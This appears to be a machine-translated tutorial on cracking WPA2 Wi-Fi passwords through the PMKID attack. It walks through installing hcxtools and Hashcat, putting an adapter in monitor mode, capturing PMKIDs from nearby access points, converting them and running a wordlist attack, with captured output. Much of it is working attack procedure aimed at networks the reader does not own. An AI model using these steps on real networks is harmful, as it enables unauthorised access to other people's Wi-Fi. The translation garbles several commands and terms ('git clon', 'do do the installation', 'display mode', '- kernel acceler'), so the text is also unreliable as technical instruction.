The Cracking password for WPA2 networks has been about the same for many years, but a new attack requires less interaction and information than previous technologies and has the added benefit of targeting access points without anyone connected. This new attack against PMKID uses Hashcat to crack WPA passwords and allows hackers to easily find networks with weak passwords.
The Old Way to Break WPA2 Password
The old way to break WPA2 has been a long time and temporarily involves disconnecting a connected device from the access point we want to try to crack. This has two disadvantages that are important for Wi-Fi hackers to understand.
The first disadvantage is the requirement that someone is connected to the network to attack it. The network password may be weak and very easy to break, but without a device associated with card kicking, there is no possibility of catching a handshake so no chance of trying to crack it.
The second disadvantage of this tactic is that it's noisy and legally worrying because it forces you to send packages that deliberately disconnect an authorized user to a service they pay to use. This type of unauthorized interference is technically an attack of denial of service and, if it is long lasting, corresponds to interference with a network. This can lead to problems and can be easily detected by some of our previous guides.
A New Password Spam Method
Instead of relying on interrupting two-way communication between Wi-Fi devices to attempt to crack the password, Attacker can communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat Forum detailed a new technique that was an attack on Robust Security Network Information Element (RSN) in a single EAPOL framework to capture the information needed to try a brute- power attack.
Like the previous attacks on WPA, the attacker must be near the network they want to attack. The goal is to use a Kali-compatible wireless network adapter to capture the information needed from the network to try to create brutally enforcing passwords. Instead of using Aireplay-ng or Aircrack-ng, we use a new wireless attack tool to make this called hcxtools.
Using Hcxtools & Hashcat
Hcxdumptool and hcxpcaptool are tools written for Wi-Fi revision and penetration testing, and allow us to interact with nearby Wi-Fi networks to capture WPA handshakes and PMKID hackers. It works like Besside-ng by requiring minimal arguments to launch a command line attack, can run against either specific targets or convenience targets and can easily be performed over SSH on a Raspberry Pi or other unattended device.
When PMKID is captured, the next step is to load the harrow in Hashcat and try to crack the password. This is where hcxtools differs from Besside-ng, because a conversion step is required to prepare the Hashcat file to use. We use hcxpcaptool to convert our PCAPNG file to a Hashcat to work with and just leave the step of selecting a strong list of passwords for your broken defense attempts.
It is worth mentioning that not every network is vulnerable to this attack. Since this is a field chosen by some manufacturers, you should not expect universal success with this technology. Whether you can capture PMKID depends on whether the manufacturer of the access point liked you to include an item containing it and if you can crack the captured PMKID depends on whether the underlying password is in your brute force password list. If any condition is not met, this attack will fail.
To try this attack, you must run Kali Linux and have access to a wireless network adapter that supports monitoring mode and package injection. We have several guides on how to choose a compatible wireless network adapter below.
Aside from a Kali-compatible network adapter, ensure that you have fully updated and upgraded your system.
Recommended: Alfa AWUS036NHA 2.4GHz
First, we will do it. install the tools we need. To download, type the following in a terminal window.
git clon https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool do do the installation
When this stops installing we will move to install hxctools. To do this, open a terminal window and paste the following line by line. If you get an error, try typing sudo before the command.
CD git clone https://github.com/ZerBea/hcxtools.git cd hxctools do do the installation
Finally, we must install Hashcat. This should be easy, as it is included in the Kali Linux repo by default. Just enter the following to install the latest version of Hashcat.
apt install hashcat
With this complete we can continue to configure the wireless network adapter.
Step 2: Prepare the Wireless Network Adapter  Once you have connected your Kali-compatible wireless network adapter, you can find the name by writing ifconfig or ip a . Typically, the name will be something like wlan0. The first step will be to put the card in wireless display mode so we can listen to Wi-Fi traffic in the immediate vicinity.
Type this command in a terminal window by entering the name of your wireless network adapter for wlan0.
airmon-ng starts wlan0 Found 3 processes that can cause problems Kill them with the help of "airmon-ng check kill" before setting card in display mode, they will interfere with switching channels and sometimes puts the interface back in handled mode PID name 555 NetworkManager 611 wpa_supplicant 6636 dhclient PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (Rev 01) (mac80211 display mode vif enabled for [phy0] wlan0 on [phy0] wlan0mon) (Mac80211 station mode vif disabled for [phy0] wlan0) phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Now your wireless network card must have a name like "wlan0mon" and be in display mode. You can confirm this by running ifconfig again.
Now we're ready to capture the PMKID devices of devices we want to attack. With our wireless network card in screen mode like "wlan1mon" we perform the following command to begin the attack.
hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status = 1
Disconnect this -i describes the program which interface we use, in this case, wlan1mon. The filename we save the results to can be specified with the flag argument -o . The channel we want to scan can be specified with the flag -c followed by the number of the channel to be scanned.
In our command above we use wlan1mon to save captured PMKID to a file called "galleria.pcapng." While you can specify another status I have not been able to capture any value except for 1 .
Warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 Warning: wlan1mon is probably a display interface start capturing (stop ctrl + c) INTERFACE: ...............: wlan1mon FILTER LIST ...............: 0 items MAC CLIENT ...............: fcc233ca8bc5 MAC ACCESS POINT .........: 10ae604b9e82 (incremented for each new client) EAPOL TIMEOUT ............: 150000 REPLAYCOUNT ..............: 62439 ANONCE ...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5  c8b5adb615e9 -> fcc233ca8bc5  2c95694f3ca0 -> fcc233ca8bc5  2c95694f3ca0 -> b4b686abc81a  14edbb9938ea -> fcc233ca8bc5  88964e3a8ea0 -> fcc233ca8bc5  dc7fa425888a -> fcc233ca8bc5  88964e801fa0 -> fcc233ca8bc5  9822efc6fdff -> ba634d3eb80d  9822efc6fdff -> ba634d3eb80d  803773defd01 -> fcc233ca8bc5  14edbb9ba0e6 -> 803773defd01  0618d629465b -> 58fb8433aac2  e0220203294e -> fcc233ca8bc5  14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha = 2, rx = 32752, rx (lost) = 2801, tx = 2205, powned = 18, err = 0
Once you have collected enough, you can stop the program by writing Ctrl- C to end the attack. This should produce a PCAPNG file containing the information we need to try a brute force attack, but we must convert it to a format that Hashcat can understand.
To convert our PCAPNG file, we use hcxpcaptool with some specified arguments. In the same folder as your .PCAPNG file is saved, run the following command in a terminal window.
hcxpcaptool -E essidlist -I ID list -U usernamelist -z galleriaHC.16800 galleria.pcapng
This command says hxcpcaptool to use the information in the file to help Hashcat understand it with flags -E -I and -U . The flag -Z is used for the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert.
If you run the command, we'll show you the following.
Summary: -------- file name ....................: galleria.pcapng file type ....................: pcapng 1.0 file hardware information ....: x86_64 file us information ..........: Linux 4.18.0-kali2-amd64 file application information.: hcxdumptool 4.2.1 network type .................: DLT_IEEE802_11_RADIO (127) endianess ....................: small endian read error ..................: error free Package inside ...............: 1089 skipped packages ..............: 0 package of GPS data ........: 0 package with FCS .............: 732 beacons (with ESSID inside): 49 probe requests ...............: 26 probe response ..............: 40 Association Requests .........: 103 association response ........: 204 reunification requests .......: 2 reassociation response ......: 7 Authentication (OPEN SYSTEM): 346 Authentications (BROADCOM) ...: 114 Authentications (APPLE) ......: 1 EAPOL Package ................: 304 EAPOL PMKIDs .................: 21 best handshakes ..............: 4 (ap-less: 1) 21 PMKID (s) written to galleriahC.16800
Here we can see that we have collected 21 PMKID in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to try to crack network passwords.
Step 5: Select a Password List and Brute Force with Hashcat
To start attacking the hasher we've taken must choose a good password list. You can find several good password lists to get started on the SecList collection. When you have a password list, place it in the same folder as the .16800 file you just converted, and then run the following command in a terminal window.
hashcat -m 16800 galleriaHC.16800 -a 0 - kernel acceler = 1 -w 4 --force topwifipass.txt & # 39;
In this command, we launch Hashcat in the 16800 mode, which is to attack WPA-PMKID-PBKDF2 network protocols. Then we enter the name of the file we want to crack, in this case "galleriaHC.16800." The flag -a tells us what kind of attacks to use, in this case a "straight" attack and then -w and – kernel-acceler = 1 flags anger highest performance workload profile. If your computer is suffering from performance issues, you can lower the number in the argument -w .
Furthermore, the force force ignores some warnings to proceed with the attack and the last part of the command specifies the password list we use to try to force the PMKIDs in our file, in this case called " topwifipass.txt. "
Depending on the speed of the machine speed and the size of the password list, it may take quite some time to complete. To view the status at any time, press S the key for an update.
When Hashcat breaks out, you will be able to check in as it progresses to see if any keys have been restored.
When the password list comes close to the end, Hashcat will automatically adjust the workload and give you a final report when it's done.
Approaching Final Key Ratio - Adjusted Workload. Session ..........: hashcat Status ...........: Exhausted Hash.Type ........: WPA-PMKID-PBKDF2 Hash.Target ......: hotspotcap.16800 Time.Started .....: Sun 28 Oct 18:05:57 2018 (3 min, 49 seconds) Time.Estimated ...: Sun Oct 28 18:09:46 2018 (0 secs) Guess.Base .......: File (topwifipass.txt) Guess.Queue ......: 1/1 (100.00%) Speed.Dev. # 1 .....: 42 H / s (15.56ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4 Recovered ........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts Progress .........: 9602/9602 (100.0%) Rejected .........: 2/9602 (0.02%) Restore.Point ....: 4801/4801 (100.0%) Candidates. # 1 ....: 159159159 -> 00001111 HWon.Dev. # 1 ......: N / A Started: Sun 28 October 18:05:56 2018 Stopped: Sun 28 Oct 18:09:49 2018
If you have managed to break any passwords you will see them here. In our test run, none of the PMKIDs we collected passwords in our password list, so we could not crack any of the hashs. This is likely to be your result against all networks with a strong password but expect to see results here for networks with a weak password.
PMKID Hashcat Attack makes Wi-Fi attacks easier
While the new attack against Wi-Fi passwords makes it easier for hackers to attempt to attack a target, the same methods that were effective against previous types of WPA cracks remain effective. If your network does not even support the robust security element that contains PMKID, this attack has no chance of success. You can review your own network with hcxtools to see if it is susceptible to this attack.
Even if your network is vulnerable, a strong password is still the best defense against an attacker accessing your Wi-Fi network using this or another password attack.
Because these attacks depend on guessing the password that the Wi-Fi network uses, there are two common sources of guessing. The first is the users who choose default or worrying bad passwords, such as "12345678" or "password." These are easily broken. The second source of password errands comes from data violations that reveal millions of real user passwords. Because many users will reuse passwords between different types of accounts, these lists tend to be very effective when cracking Wi-Fi networks.
I hope you have this guide for the new PMKID-based Hashcat attack on WPA2 password! If you have any questions about this Wi-Fi password cracking tutorial or if you have a comment, please contact me on Twitter @ KodyKinzie .
Do not Miss: Null Bytes Collection of Wi-Fi Hacking Guides